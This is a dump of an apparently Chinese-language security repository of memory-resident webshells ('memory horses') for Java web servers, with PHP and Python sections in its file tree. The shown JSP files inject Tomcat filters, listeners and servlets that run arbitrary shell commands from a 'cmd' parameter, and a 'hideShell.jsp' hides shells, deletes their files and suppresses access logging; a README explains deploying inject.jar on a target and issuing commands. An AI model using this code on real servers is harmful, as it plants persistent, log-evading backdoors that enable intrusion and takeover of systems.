├── MemShellForJava
    ├── filter
    │   └── addFilter.jsp
    ├── listener
    │   └── AddListener.jsp
    ├── servlet
    │   ├── AddServlet.jsp
    │   └── README.md
    ├── spring
    │   └── README.md
    ├── 任意jsp隐藏
    │   └── hideShell.jsp
    ├── 字节码增强型
    │   ├── redefine字节码
    │   │   └── README.md
    │   └── retransform字节码
    │   │   ├── README.md
    │   │   ├── linux_agent
    │   │       └── memShell
    │   │       │   ├── README.md
    │   │       │   ├── agent.iml
    │   │       │   ├── lib
    │   │       │       ├── agent.jar
    │   │       │       └── tools.jar
    │   │       │   ├── pom.xml
    │   │       │   └── src
    │   │       │       └── net
    │   │       │           └── rebeyond
    │   │       │               └── memshell
    │   │       │                   ├── Evaluate.java
    │   │       │                   └── redefine
    │   │       │                       ├── MyRequest.java
    │   │       │                       ├── MyResponse.java
    │   │       │                       ├── MyServletContext.java
    │   │       │                       ├── MyServletInputStream.java
    │   │       │                       ├── MyServletOutputStream.java
    │   │       │                       └── MySession.java
    │   │   ├── linux_inject
    │   │       └── memShell
    │   │       │   ├── .classpath
    │   │       │   ├── .fatjar
    │   │       │   ├── .project
    │   │       │   ├── META-INF
    │   │       │       └── MANIFEST.MF
    │   │       │   ├── README.md
    │   │       │   ├── inject.iml
    │   │       │   ├── lib
    │   │       │       ├── agent.jar
    │   │       │       ├── inject.jar
    │   │       │       └── javax.servlet-api-3.1.0.jar
    │   │       │   ├── out
    │   │       │       ├── agent.jar
    │   │       │       ├── inject.jar
    │   │       │       ├── shell_3_0_2.jsp
    │   │       │       └── shell_3_0_5.jsp
    │   │       │   ├── pom.xml
    │   │       │   └── src
    │   │       │       ├── META-INF
    │   │       │           └── MANIFEST.MF
    │   │       │       ├── net
    │   │       │           └── rebeyond
    │   │       │           │   └── memshell
    │   │       │           │       ├── Agent.java
    │   │       │           │       ├── Attach.java
    │   │       │           │       ├── Evaluate.java
    │   │       │           │       ├── Proxy.java
    │   │       │           │       ├── Shell.java
    │   │       │           │       └── Transformer.java
    │   │       │       └── source.txt
    │   │   └── release
    │   │       ├── agent.jar
    │   │       └── inject.jar
    └── 漏洞环境
    │   ├── README.md
    │   ├── upload-demo.war
    │   └── upload-demo
    │       ├── .idea
    │           ├── misc.xml
    │           ├── modules.xml
    │           ├── upload.iml
    │           └── workspace.xml
    │       ├── META-INF
    │           └── war-tracker
    │       ├── WEB-INF
    │           ├── classes
    │           │   ├── action
    │           │   │   ├── DownAction.class
    │           │   │   ├── UploadAction.class
    │           │   │   └── UploadMoreAction.class
    │           │   └── struts.xml
    │           ├── lib
    │           │   ├── commons-fileupload-1.3.1.jar
    │           │   ├── commons-io-2.2.jar
    │           │   ├── commons-lang3-3.2.jar
    │           │   ├── freemarker-2.3.19.jar
    │           │   ├── javassist-3.11.0.GA.jar
    │           │   ├── ognl-3.0.6.jar
    │           │   ├── struts2-core-2.3.20.jar
    │           │   ├── struts2-json-plugin-2.3.20.jar
    │           │   └── xwork-core-2.3.20.jar
    │           └── web.xml
    │       ├── filemore.jsp
    │       ├── index.jsp
    │       └── success.jsp
├── MemShellForPHP
    ├── 内存驻留webshell
    │   ├── README.md
    │   ├── memWebshell.php
    │   └── test.txt
    ├── 漏洞环境
    │   └── php内存马漏洞环境.md
    └── 通过php-fpm未授权访问漏洞攻击
    │   ├── 1.txt
    │   ├── README.md
    │   └── php-fpm-exp.py
├── MemShellForPython
    ├── python flask 内存马.assets
    │   ├── image-20210329220246511.png
    │   └── image-20210329220308313.png
    ├── python flask 内存马.md
    └── 漏洞环境
    │   └── flaskSstiServer.py
├── README.assets
    └── wechat.jpeg
└── README.md


/MemShellForJava/filter/addFilter.jsp:
--------------------------------------------------------------------------------
  1 | <%@ page language="java" contentType="text/html; charset=UTF-8"
  2 |     pageEncoding="UTF-8"%>
  3 | <%@ page import="java.io.IOException"%>
  4 | <%@ page import="javax.servlet.DispatcherType"%>
  5 | <%@ page import="javax.servlet.Filter"%>
  6 | <%@ page import="javax.servlet.FilterChain"%>
  7 | <%@ page import="javax.servlet.FilterConfig"%>
  8 | <%@ page import="javax.servlet.FilterRegistration"%>
  9 | <%@ page import="javax.servlet.ServletContext"%>
 10 | <%@ page import="javax.servlet.ServletException"%>
 11 | <%@ page import="javax.servlet.ServletRequest"%>
 12 | <%@ page import="javax.servlet.ServletResponse"%>
 13 | <%@ page import="javax.servlet.annotation.WebServlet"%>
 14 | <%@ page import="javax.servlet.http.HttpServlet"%>
 15 | <%@ page import="javax.servlet.http.HttpServletRequest"%>
 16 | <%@ page import="javax.servlet.http.HttpServletResponse"%>
 17 | <%@ page import="org.apache.catalina.core.ApplicationContext"%>
 18 | <%@ page import="org.apache.catalina.core.ApplicationFilterConfig"%>
 19 | <%@ page import="org.apache.catalina.core.StandardContext"%>
 20 | <%@ page import="org.apache.tomcat.util.descriptor.web.*"%>
 21 | <%@ page import="org.apache.catalina.Context"%>
 22 | <%@ page import="java.lang.reflect.*"%>
 23 | <%@ page import="java.util.EnumSet"%>
 24 | <%@ page import="java.util.Map"%>
 25 | 
 26 | 
 27 | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
 28 | <html>
 29 | <head>
 30 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 31 | <title>Insert title here</title>
 32 | </head>
 33 | <body>
 34 | <%
 35 | final String name = "n1ntyfilter";
 36 | 
 37 | ServletContext ctx = request.getSession().getServletContext();
 38 | Field f = ctx.getClass().getDeclaredField("context");
 39 | f.setAccessible(true);
 40 | ApplicationContext appCtx = (ApplicationContext)f.get(ctx);
 41 | 
 42 | f = appCtx.getClass().getDeclaredField("context");
 43 | f.setAccessible(true);
 44 | StandardContext standardCtx = (StandardContext)f.get(appCtx);
 45 | 
 46 | 
 47 | f = standardCtx.getClass().getDeclaredField("filterConfigs");
 48 | f.setAccessible(true);
 49 | Map filterConfigs = (Map)f.get(standardCtx);
 50 | 
 51 | if (filterConfigs.get(name) == null) {
 52 |    out.println("inject "+ name);
 53 |    
 54 |    Filter filter = new Filter() {
 55 |       @Override
 56 |       public void init(FilterConfig arg0) throws ServletException {
 57 |          // TODO Auto-generated method stub
 58 |       }
 59 |       
 60 |       @Override
 61 |       public void doFilter(ServletRequest arg0, ServletResponse arg1, FilterChain arg2)
 62 |             throws IOException, ServletException {
 63 |          // TODO Auto-generated method stub
 64 |          HttpServletRequest req = (HttpServletRequest)arg0;
 65 |          if (req.getParameter("cmd") != null) {
 66 |             byte[] data = new byte[1024];
 67 |             Process p = new ProcessBuilder("/bin/bash","-c", req.getParameter("cmd")).start();
 68 |             int len = p.getInputStream().read(data);
 69 |             p.destroy();
 70 |             arg1.getWriter().write(new String(data, 0, len));
 71 |             return;
 72 |          } 
 73 |          arg2.doFilter(arg0, arg1);
 74 |       }
 75 |       
 76 |       @Override
 77 |       public void destroy() {
 78 |          // TODO Auto-generated method stub
 79 |       }
 80 |    };
 81 |    
 82 |    FilterDef filterDef = new FilterDef();
 83 |     filterDef.setFilterName(name);
 84 |     filterDef.setFilterClass(filter.getClass().getName());
 85 |     filterDef.setFilter(filter);
 86 |     
 87 |     standardCtx.addFilterDef(filterDef);
 88 |    
 89 |    FilterMap m = new FilterMap();
 90 |    m.setFilterName(filterDef.getFilterName());
 91 |    m.setDispatcher(DispatcherType.REQUEST.name());
 92 |    m.addURLPattern("/*");
 93 |    
 94 |    
 95 |    standardCtx.addFilterMapBefore(m);
 96 |    
 97 |    
 98 |    Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
 99 |    constructor.setAccessible(true);
100 |    FilterConfig filterConfig = (FilterConfig)constructor.newInstance(standardCtx, filterDef);
101 |    
102 |    
103 |     filterConfigs.put(name, filterConfig);
104 |     
105 |     out.println("injected");
106 | }
107 | %>
108 | </body>
109 | </html>


--------------------------------------------------------------------------------
/MemShellForJava/listener/AddListener.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="org.apache.catalina.core.ApplicationContext" %>
 2 | <%@ page import="org.apache.catalina.core.StandardContext" %>
 3 | <%
 4 |     Object obj = request.getServletContext();
 5 |     java.lang.reflect.Field field = obj.getClass().getDeclaredField("context");
 6 |     field.setAccessible(true);
 7 |     ApplicationContext applicationContext = (ApplicationContext) field.get(obj);
 8 |     //获取ApplicationContext
 9 |     field = applicationContext.getClass().getDeclaredField("context");
10 |     field.setAccessible(true);
11 |     StandardContext standardContext = (StandardContext) field.get(applicationContext);
12 |     //获取StandardContext
13 |     ListenerDemo listenerdemo = new ListenerDemo();
14 |     //创建能够执行命令的Listener
15 |     standardContext.addApplicationEventListener(listenerdemo);
16 | %>
17 | <%!
18 |     public class ListenerDemo implements ServletRequestListener {
19 |         public void requestDestroyed(ServletRequestEvent sre) {
20 |             System.out.println("requestDestroyed");
21 |         }
22 |         public void requestInitialized(ServletRequestEvent sre) {
23 |             System.out.println("requestInitialized");
24 |             try{
25 |                 String cmd = sre.getServletRequest().getParameter("cmd");
26 |                 Runtime.getRuntime().exec(cmd);
27 |             }catch (Exception e ){
28 |                 //e.printStackTrace();
29 |             }
30 |         }
31 |     }
32 | %>


--------------------------------------------------------------------------------
/MemShellForJava/servlet/AddServlet.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.io.IOException" %>
 2 | <%@ page import="java.io.InputStream" %>
 3 | <%@ page import="java.util.Scanner" %>
 4 | <%@ page import="org.apache.catalina.core.StandardContext" %>
 5 | <%@ page import="java.io.PrintWriter" %>
 6 | 
 7 | <%
 8 |     // 创建恶意Servlet
 9 |     Servlet servlet = new Servlet() {
10 |         @Override
11 |         public void init(ServletConfig servletConfig) throws ServletException {
12 | 
13 |         }
14 |         @Override
15 |         public ServletConfig getServletConfig() {
16 |             return null;
17 |         }
18 |         @Override
19 |         public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
20 |             String cmd = servletRequest.getParameter("cmd");
21 |             boolean isLinux = true;
22 |             String osTyp = System.getProperty("os.name");
23 |             if (osTyp != null && osTyp.toLowerCase().contains("win")) {
24 |                 isLinux = false;
25 |             }
26 |             String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
27 |             InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
28 |             Scanner s = new Scanner(in).useDelimiter("\\a");
29 |             String output = s.hasNext() ? s.next() : "";
30 |             PrintWriter out = servletResponse.getWriter();
31 |             out.println(output);
32 |             out.flush();
33 |             out.close();
34 |         }
35 |         @Override
36 |         public String getServletInfo() {
37 |             return null;
38 |         }
39 |         @Override
40 |         public void destroy() {
41 | 
42 |         }
43 |     };
44 | 
45 |     %>
46 | <%
47 |     // 获取StandardContext
48 |     org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
49 |     StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();
50 | 
51 |     // 用Wrapper对其进行封装
52 |     org.apache.catalina.Wrapper newWrapper = standardCtx.createWrapper();
53 |     newWrapper.setName("jweny");
54 |     newWrapper.setLoadOnStartup(1);
55 |     newWrapper.setServlet(servlet);
56 |     newWrapper.setServletClass(servlet.getClass().getName());
57 | 
58 |     // 添加封装后的恶意Wrapper到StandardContext的children当中
59 |     standardCtx.addChild(newWrapper);
60 | 
61 |     // 添加ServletMapping将访问的URL和Servlet进行绑定
62 |     standardCtx.addServletMapping("/shell","jweny");
63 | %>


--------------------------------------------------------------------------------
/MemShellForJava/servlet/README.md:
--------------------------------------------------------------------------------
1 | 哥斯拉的内存马为servlet型。


--------------------------------------------------------------------------------
/MemShellForJava/spring/README.md:
--------------------------------------------------------------------------------
1 | writing...


--------------------------------------------------------------------------------
/MemShellForJava/任意jsp隐藏/hideShell.jsp:
--------------------------------------------------------------------------------
  1 | <%@page import="java.awt.SystemColor"%>
  2 | <%@page import="org.apache.jasper.JspCompilationContext"%>
  3 | <%@page import="java.io.*"%>
  4 | <%@page import="java.util.*"%>
  5 | <%@page import="java.util.zip.*"%>
  6 | <%@ page import="javax.servlet.jsp.*"%>
  7 | <%@page import="org.apache.jasper.EmbeddedServletOptions"%>
  8 | <%@page import="org.apache.jasper.compiler.JspRuntimeContext"%>
  9 | <%@page import="org.apache.jasper.servlet.JspServletWrapper" %>
 10 | <%@page import="org.apache.catalina.valves.AccessLogValve"%>
 11 | <%@page import="org.apache.catalina.AccessLog"%>
 12 | <%@page import="org.apache.catalina.core.AccessLogAdapter"%>
 13 | <%@page import="org.apache.catalina.core.StandardHost"%>
 14 | <%@ page import="org.apache.catalina.core.ApplicationContext"%>
 15 | <%@ page import="org.apache.catalina.core.StandardContext"%>
 16 | <%@ page language="java" contentType="text/html; charset=UTF-8"
 17 |     pageEncoding="UTF-8"%>
 18 | <%@ page import="java.lang.reflect.*" %><%!
 19 | private static class AttachingWrapper extends JspServletWrapper {
 20 | 	private JspServletWrapper original = null;
 21 | 	private JspServletWrapper evil = null;
 22 | 
 23 | 	
 24 | 	public AttachingWrapper(JspServletWrapper original, JspServletWrapper evil, ServletConfig config, org.apache.jasper.Options options,
 25 |             String jspUri, JspRuntimeContext rctxt) {
 26 | 		super(config, options, jspUri, rctxt);
 27 | 
 28 | 		this.original = original;
 29 | 		this.evil = evil;
 30 | 	}
 31 | 
 32 | 	public void service(HttpServletRequest request, 
 33 |                         HttpServletResponse response,
 34 |                         boolean precompile)
 35 |             throws ServletException, IOException, FileNotFoundException {
 36 |             	if (request.getHeader("Evil") != null) {
 37 |             		try {
 38 | 						nolog(request);
 39 |             		} catch (Exception ex){}
 40 |             		this.evil.service(request, response, precompile);
 41 |             	} else {
 42 |             		this.original.service(request, response, precompile);
 43 |             	}
 44 | 	}
 45 | }
 46 | private static class SpyClassLoader extends ClassLoader{
 47 | 	private byte[] zipdata = null;
 48 | 	private JspWriter out = null;
 49 | 
 50 | 	private Map<String, byte[]> cls = new HashMap<String, byte[]>();
 51 | 	public SpyClassLoader(ClassLoader parent,  byte[] zipdata, JspWriter out) throws Exception {
 52 | 		super(parent);
 53 | 		this.out = out;
 54 | 		this.zipdata = zipdata;
 55 | 		this.processZip();
 56 | 	}
 57 | 
 58 | 	private void processZip() throws Exception {
 59 | 		if (this.zipdata != null) {
 60 | 			ZipInputStream stream = null;
 61 | 			stream = new ZipInputStream(new ByteArrayInputStream(this.zipdata));
 62 | 				byte[] buffer = new byte[2048];
 63 | 				ZipEntry entry;
 64 | 				while((entry = stream.getNextEntry())!=null)
 65 | 				{
 66 | 					
 67 | 					ByteArrayOutputStream output = null;
 68 | 					try
 69 | 					{
 70 | 						output = new ByteArrayOutputStream();
 71 | 						int len = 0;
 72 | 						while ((len = stream.read(buffer)) > 0)
 73 | 						{
 74 | 							output.write(buffer, 0, len);
 75 | 						}
 76 | 					}
 77 | 					finally
 78 | 					{
 79 | 						if(output!=null) output.close();
 80 | 						//this.out.println(entry.getName());
 81 | 						this.cls.put("org.apache.jsp."+entry.getName(), output.toByteArray());
 82 | 					}
 83 | 				}
 84 | 			stream.close();
 85 | 		}
 86 | 	}
 87 | 
 88 | 	protected Class<?> findClass(String name)
 89 |                       throws ClassNotFoundException {
 90 | 
 91 |         byte[] clsdata = this.cls.get(name+".class");
 92 |         if (clsdata != null) {
 93 |         	return super.defineClass(name, clsdata, 0, clsdata.length);
 94 |         }
 95 |         return null;
 96 | 	}
 97 | 
 98 | 
 99 | 	public Class defineClass(String name,byte[] b) {
100 | 		return super.defineClass(name,b,0,b.length);
101 | 	}
102 | }
103 | private static class UploadBean {
104 | 		private ServletInputStream sis = null;
105 | 		private OutputStream targetOutput = null;
106 | 		private byte[] b = new byte[1024];
107 | 		private String fileName = null;
108 | 
109 | 		public String getFileName() {
110 | 			return this.fileName;
111 | 		}
112 | 
113 | 		public void setTargetOutput(OutputStream stream) {
114 | 			this.targetOutput = stream;
115 | 		}
116 | 		public UploadBean(OutputStream stream) {
117 | 			this.setTargetOutput(stream);
118 | 		}
119 | 		
120 | 		public void parseRequest(HttpServletRequest request) throws IOException {
121 | 			  sis = request.getInputStream();
122 | 			  int a = 0;
123 | 			  int k = 0;
124 | 			  String s = "";
125 | 			  while ((a = sis.readLine(b,0,b.length))!= -1) {
126 | 				s = new String(b, 0, a,"UTF-8");
127 | 				 if ((k = s.indexOf("filename=\""))!= -1) {
128 | 					s = s.substring(k + 10);
129 | 					k = s.indexOf("\"");
130 | 					s = s.substring(0, k);
131 | 					File tF = new File(s);
132 | 					if (tF.isAbsolute()) {
133 | 						fileName = tF.getName();
134 | 					} else {
135 | 						fileName = s;
136 | 					}
137 | 					k = s.lastIndexOf(".");
138 | 					// suffix = s.substring(k + 1);
139 | 					upload();
140 | 				 }
141 | 			  }
142 | 		}
143 | 		private void upload() throws IOException{
144 | 			try {
145 | 					OutputStream out = this.targetOutput;
146 | 					
147 | 					 int a = 0;
148 | 					 int k = 0;
149 | 					 String s = "";
150 | 					 while ((a = sis.readLine(b,0,b.length))!=-1) {
151 | 						s = new String(b, 0, a);
152 | 						if ((k = s.indexOf("Content-Type:"))!=-1) {
153 | 						  break;
154 | 						}
155 | 					}
156 | 					sis.readLine(b,0,b.length);
157 | 					while ((a = sis.readLine(b,0,b.length)) != -1) {
158 | 						s = new String(b, 0, a);
159 | 						if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
160 | 						  break;
161 | 						}
162 | 						out.write(b, 0, a);
163 | 					}
164 | 					out.close();
165 | 					//if (out instanceof FileOutputStream)
166 | 						//out.close();
167 | 				} catch (IOException ioe) {
168 | 					throw ioe;
169 | 				}
170 | 		}
171 | 	}
172 | 
173 | private static final Map<String, JspServletWrapper> hiddenWrappers = new HashMap<String, JspServletWrapper>();
174 | 
175 | public static String makeWrapperUri(HttpServletRequest request) {
176 | 	String uri = request.getServletPath();
177 | 	String pathinfo = request.getPathInfo();
178 | 	if (pathinfo != null) {
179 | 		uri += pathinfo;
180 | 	}
181 | 	return uri;
182 | }
183 | public static boolean accessingSelf(HttpServletRequest request, JspRuntimeContext jctxt) {
184 | 	JspServletWrapper wrapper = getHideShellWrapper(request, jctxt);
185 | 	String requestUri = makeWrapperUri(request);
186 | 	if (!wrapper.getJspUri().equals(requestUri)) {
187 | 		return false;
188 | 	}
189 | 	return true;
190 | }
191 | public static void includeHiddenShell(HttpServletRequest request, HttpServletResponse response) throws Exception {
192 | 	JspServletWrapper wrapper = hiddenWrappers.get(makeWrapperUri(request));
193 | 	if (wrapper != null) {
194 | 		wrapper.service(request, response, false);
195 | 	} else {
196 | 		response.sendError(404, "the hidden JspServletWrapper doesn't exist, this should not happen");
197 | 	}
198 | }
199 | public static JspServletWrapper getHideShellWrapper(HttpServletRequest request, JspRuntimeContext jctxt) {
200 | 	String wrapperUri = makeWrapperUri(request);
201 | 	JspServletWrapper self = jctxt.getWrapper(wrapperUri); 
202 | 	return self;
203 | }
204 | public static void hideWrapper(JspServletWrapper wrapper) throws Exception {
205 | 	wrapper.setLastModificationTest(System.currentTimeMillis() + 31536000 * 1000);
206 | 	JspCompilationContext ctxt = wrapper.getJspEngineContext();
207 | 	EmbeddedServletOptions jspServletOptions = (EmbeddedServletOptions)ctxt.getOptions();
208 | 	if ((Integer)getFieldValue(jspServletOptions, "modificationTestInterval") <= 0) {
209 | 		setFieldValue(jspServletOptions, "modificationTestInterval", 1);	
210 | 	}
211 | }
212 | public static Object invoke(Object obj, String methodName, Class[] paramTypes, Object[] args) throws Exception {
213 | 	Method m = obj.getClass().getDeclaredMethod(methodName, paramTypes);
214 | 	m.setAccessible(true);
215 | 	return m.invoke(obj, args);
216 | }
217 | public static Object getFieldValue(Object obj, String fieldName) throws Exception {
218 | 	Field f = obj.getClass().getDeclaredField(fieldName);
219 | 	f.setAccessible(true);
220 | 	return f.get(obj);
221 | }
222 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
223 | 	Field f = obj.getClass().getDeclaredField(fieldName);
224 | 	f.setAccessible(true);
225 | 	if (Modifier.isFinal(f.getModifiers())) {
226 | 		//reset final field
227 | 		Field modifiersField = Field.class.getDeclaredField("modifiers");
228 | 	    modifiersField.setAccessible(true);
229 | 	    modifiersField.setInt(f, f.getModifiers() & ~Modifier.FINAL);	
230 | 	}
231 | 	f.set(obj, value);
232 | }
233 | public static String makeHiddenName(String wrapperName) {
234 | 	int lastIndex = wrapperName.lastIndexOf('/');
235 | 	return wrapperName.substring(0, lastIndex + 1) + "hidden-" + wrapperName.substring(lastIndex + 1);
236 | }
237 | public static boolean isHiddenJsp(ServletRequest request, String key, JspServletWrapper wrapper) {
238 | 	JspCompilationContext ctxt = wrapper.getJspEngineContext();
239 | 	if (!new File(request.getServletContext().getRealPath(ctxt.getJspFile())).exists() || !key.equals(wrapper.getJspUri())) {
240 | 		return true;
241 | 	}
242 | 	return  false;
243 | }
244 | public static void nolog(HttpServletRequest request) throws Exception {
245 | 	ServletContext ctx = request.getSession().getServletContext();
246 | 	ApplicationContext appCtx = (ApplicationContext)getFieldValue(ctx, "context");
247 | 	StandardContext standardCtx = (StandardContext)getFieldValue(appCtx, "context");
248 | 	
249 | 	StandardHost host = (StandardHost)standardCtx.getParent();
250 | 	AccessLogAdapter accessLog = (AccessLogAdapter)host.getAccessLog();
251 | 	
252 | 	AccessLog[] logs = (AccessLog[])getFieldValue(accessLog, "logs");
253 | 	for(AccessLog log:logs) {
254 | 		AccessLogValve logV = (AccessLogValve)log;
255 | 		String condition = logV.getCondition() == null ? "n1nty_nolog" : logV.getCondition();
256 | 		logV.setCondition(condition);
257 | 		request.setAttribute(condition, "n1nty_nolog");
258 | 	}
259 | }
260 | %><%
261 | nolog(request);
262 | 
263 | Object r = getFieldValue(request, "request");
264 | Object filterChain = getFieldValue(r, "filterChain");
265 | Object servlet = getFieldValue(filterChain, "servlet");
266 | JspRuntimeContext jctxt = (JspRuntimeContext)getFieldValue(servlet, "rctxt");
267 | 
268 | if (!accessingSelf(request, jctxt)) {
269 | 	includeHiddenShell(request, response);
270 | 	return;
271 | }
272 | 
273 | %>
274 | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
275 | <html>
276 | <head>
277 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
278 | <title>Hideshell.jsp by n1nty</title>
279 | </head>
280 | <body>
281 | 
282 | <ul>
283 | <%
284 | String action = request.getParameter("action");
285 | 
286 | if ("upload".equals(action)) {
287 | 
288 | 	ByteArrayOutputStream byteout = new ByteArrayOutputStream();
289 | 	UploadBean upload = new UploadBean(byteout);
290 | 	upload.parseRequest(request);
291 | 
292 | 	boolean zip = upload.getFileName().endsWith(".zip");
293 | 	String path = !zip ? "/test.jsp" : "/jspspy2010.jsp";
294 | 	String clsName = !zip ? "org.apache.jsp.test_jsp" : "org.apache.jsp.jspspy2010_jsp";
295 | 
296 | 	javax.servlet.ServletConfig servletConfig = (javax.servlet.ServletConfig)getFieldValue(servlet, "config");
297 | 	org.apache.jasper.Options options = (org.apache.jasper.Options)getFieldValue(servlet, "options");
298 | 	JspServletWrapper wrapper = new JspServletWrapper(servletConfig, options, path, jctxt);
299 | 
300 | 	hideWrapper(wrapper);
301 | 	wrapper.setReload(false);
302 | 
303 | 
304 | 	byte[] data = byteout.toByteArray();
305 | 	byte[] bytes = new byte[data.length -2];
306 | 	System.arraycopy(data, 0, bytes, 0, data.length -2);
307 | 
308 | 	Class cls = null;
309 | 	if (zip) {
310 | 		cls = new SpyClassLoader(this.getClass().getClassLoader(), bytes, out).loadClass(clsName);
311 | 	} else {
312 | 		cls = new SpyClassLoader(this.getClass().getClassLoader(), null, out).defineClass(clsName, bytes);
313 | 	}
314 | 	if (cls != null) {
315 | 		Servlet s = (Servlet)cls.newInstance();
316 | 		s.init(servletConfig);
317 | 		setFieldValue(wrapper, "theServlet", s);
318 | 		jctxt.addWrapper(path, getHideShellWrapper(request, jctxt));
319 | 		hiddenWrappers.put(path, wrapper);
320 | 	} else {
321 | 		out.println("no class");
322 | 	}
323 | 	
324 | 	
325 | }
326 | 
327 | if (action == null || action.equals("list") || action.equals("upload")) {
328 | 	Map<String, JspServletWrapper> jsps = (Map<String, JspServletWrapper>)getFieldValue(jctxt, "jsps");
329 | 	for (Map.Entry<String, JspServletWrapper> entry : jsps.entrySet()) {
330 | 		JspServletWrapper wrapper = entry.getValue();
331 | 		%>
332 | 		<li>		 
333 | 		<%
334 | 		if (isHiddenJsp(request, entry.getKey(), wrapper)) {
335 | 			%>
336 | 			<a href='<%=entry.getKey() %>'> <%=entry.getKey() %></a> possible hidden file,  <a href='?action=delete&wrapperName=<%=entry.getKey() %>'> Delete </a>
337 | 			<a href='?action=attach&wrapperName=<%=entry.getKey() %>'> Attach to normal.jsp</a>
338 | 			<%
339 | 		} else {
340 | 			%>
341 | 			<a href='?action=hide&wrapperName=<%=entry.getKey() %>'>Hide <%=entry.getKey() %></a>
342 | 			<a href='?action=attach&wrapperName=<%=entry.getKey() %>'> Attach to normal.jsp</a>
343 | 			<%
344 | 		}
345 | 		%>
346 | 		</li>
347 | 		<%
348 | 	}
349 | } else if (action.equals("hide")) {
350 | 	String wrapperName = request.getParameter("wrapperName");
351 | 	String hiddenWrapperName = makeHiddenName(wrapperName);
352 | 	if (jctxt.getWrapper(hiddenWrapperName) == null) {
353 | 		JspServletWrapper wrapper = jctxt.getWrapper(wrapperName);
354 | 		
355 | 		hideWrapper(wrapper);
356 | 		/*
357 | 		wrapper.setLastModificationTest(System.currentTimeMillis() + 31536000 * 1000);
358 | 		JspCompilationContext ctxt = wrapper.getJspEngineContext();
359 | 		EmbeddedServletOptions jspServletOptions = (EmbeddedServletOptions)ctxt.getOptions();
360 | 		if ((Integer)getFieldValue(jspServletOptions, "modificationTestInterval") <= 0) {
361 | 			setFieldValue(jspServletOptions, "modificationTestInterval", 1);	
362 | 		}*/
363 | 		
364 | 		wrapper.getJspEngineContext().getCompiler().removeGeneratedFiles();
365 | 		
366 | 		if (wrapper == getHideShellWrapper(request, jctxt)) {
367 | 			// is hiding hideshell.jsp itself
368 | 			setFieldValue(wrapper, "jspUri", hiddenWrapperName);
369 | 			jctxt.addWrapper(hiddenWrapperName, wrapper);
370 | 		} else {
371 | 			jctxt.addWrapper(hiddenWrapperName, getHideShellWrapper(request, jctxt));
372 | 			hiddenWrappers.put(hiddenWrapperName, wrapper);
373 | 		}
374 | 		
375 | 		jctxt.removeWrapper(wrapperName);
376 | 
377 | 		JspCompilationContext ctxt = wrapper.getJspEngineContext();
378 | 		new File(request.getServletContext().getRealPath(ctxt.getJspFile())).delete();
379 | 	}
380 | 	out.println("done");
381 | }  else if (action.equals("delete")) {
382 | 	String wrapperName = request.getParameter("wrapperName");
383 | 	jctxt.removeWrapper(wrapperName);
384 | 	hiddenWrappers.remove(wrapperName);
385 | 	out.println("done");
386 | 	
387 | } else if (action.equals("attach")) {
388 | 	String wrapperName = request.getParameter("wrapperName");
389 | 	String attachto = "/normal.jsp";
390 | 
391 | 	JspServletWrapper original = jctxt.getWrapper(attachto);
392 | 
393 | 	if (original == null) {
394 | 		out.println("access /normal.jsp first");
395 | 		return;
396 | 	}
397 | 	JspServletWrapper evil = jctxt.getWrapper(wrapperName);
398 | 
399 | 	javax.servlet.ServletConfig servletConfig = (javax.servlet.ServletConfig)getFieldValue(servlet, "config");
400 | 	org.apache.jasper.Options options = (org.apache.jasper.Options)getFieldValue(servlet, "options");
401 | 
402 | 	AttachingWrapper attachingWrapper = new AttachingWrapper(original, evil, servletConfig, options, attachto, jctxt);
403 | 	hideWrapper(attachingWrapper);
404 | 	attachingWrapper.setReload(false);
405 | 
406 | 	hideWrapper(evil);
407 | 
408 | 	jctxt.removeWrapper(wrapperName);
409 | 	jctxt.removeWrapper(attachto);
410 | 
411 | 	jctxt.addWrapper(attachto, attachingWrapper);
412 | 
413 | 
414 | 	JspCompilationContext ctxt = evil.getJspEngineContext();
415 | 	new File(request.getServletContext().getRealPath(ctxt.getJspFile())).delete();
416 | 	// jctxt.addWrapper(attachto, getHideShellWrapper(request, jctxt));
417 | 	// hiddenWrappers.put(attachto, attachingWrapper);
418 | }
419 | 
420 | 
421 | %>
422 | </ul>
423 | 
424 | <form action="?action=upload" method="post" enctype="multipart/form-data">
425 | <input type="file" name="fff">
426 | <input type="submit">
427 | </form>
428 | 
429 | </body>
430 | </html>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/redefine字节码/README.md:
--------------------------------------------------------------------------------
1 | 冰蝎3.0-BETA7 内存马为redefine字节码型。
2 | 
3 | https://github.com/rebeyond/Behinder/releases
4 | 
5 | https://github.com/MountCloud/BehinderClientSource
6 | 
7 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/README.md:
--------------------------------------------------------------------------------
 1 | 将release中的inject.jar agent.jar复制目标服务器。
 2 | 
 3 | 运行inject.jar:
 4 | 
 5 | (测试时注意备份，会删除自身和agent.jar)
 6 | 
 7 |     java -jar inject.jar 123
 8 | 
 9 | 连接内存马：
10 | 
11 |     http://ip:port/1.jsp?pass_the_world=123&model=chopper
12 | 
13 | 执行命令：
14 | 
15 | ```
16 | http://ip:port/1.jsp?pass_the_world=123&model=exec&cmd=whoami
17 | ```
18 | 
19 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/README.md:
--------------------------------------------------------------------------------
 1 | # memShell
 2 | a webshell resides in the memory of java web server
 3 | 
 4 | # install
 5 | * unzip memShell.zip
 6 | * cd memShell
 7 | * java -jar inject.jar
